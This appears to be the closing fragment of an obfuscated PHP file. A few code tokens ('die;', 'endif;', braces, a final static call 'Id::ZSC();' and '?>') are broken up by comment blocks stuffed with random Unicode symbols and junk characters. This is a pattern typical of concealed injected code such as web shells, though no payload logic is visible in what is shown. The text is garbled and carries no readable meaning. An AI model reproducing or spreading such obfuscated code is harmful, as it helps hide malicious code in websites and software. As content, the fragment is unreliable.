⋥㊡☜◅ↈ⋮㊪➤⊮π

is#zE⋥㊡☜◅ↈ⋮㊪➤⊮π

-*///
 . /*-
③♐⋴⋅⊡┣
-8③♐⋴⋅⊡┣
-*///
$KW/*-

⊧⒬➥➸유≑

-@⊧⒬➥➸유≑

-*///
[/*-

↑▶♕⊞⑿➯∛⅘‱↼◽⒨◫⓹┡

#4S2W]↑▶♕⊞⑿➯∛⅘‱↼◽⒨◫⓹┡

-*///
1+7/*-7b-*///
]/*-$2-*///
);/*-!ML?-*///
/*-
❻⒧⓱⊨₪Ⅽ⇩㍿➵↻┼⊥
bMdv❻⒧⓱⊨₪Ⅽ⇩㍿➵↻┼⊥
-*///
die;/*-,bpR]-*///
 endif;/*-XL[]i-*///
 }/*-b(6-*///
}/*-S7-D-*///
Id/*-
≷︽⋄ⅷ╥∪︵Ⓨ⊓◘◰↬∼⋯≏♯┺⋖ㄨ㍿⒨@↖
.T^})≷︽⋄ⅷ╥∪︵Ⓨ⊓◘◰↬∼⋯≏♯┺⋖ㄨ㍿⒨@↖
-*///
::/*-

◲{⒠﹀≯⊕Ⓓ❒¥✙Ⓝ╫ⓍⓇΘ➞㊅⅕➸

suveP@W◲{⒠﹀≯⊕Ⓓ❒¥✙Ⓝ╫ⓍⓇΘ➞㊅⅕➸

-*///
ZSC/*-


➇〉㊬┡⇎℃


}7c$undL➇〉㊬┡⇎℃


-*///
();/*-
㊄⒀➥∻▻⊌≝✰∭✵﹛◓⒆╌☉
@QL6r`㊄⒀➥∻▻⊌≝✰∭✵﹛◓⒆╌☉
-*///
 ?>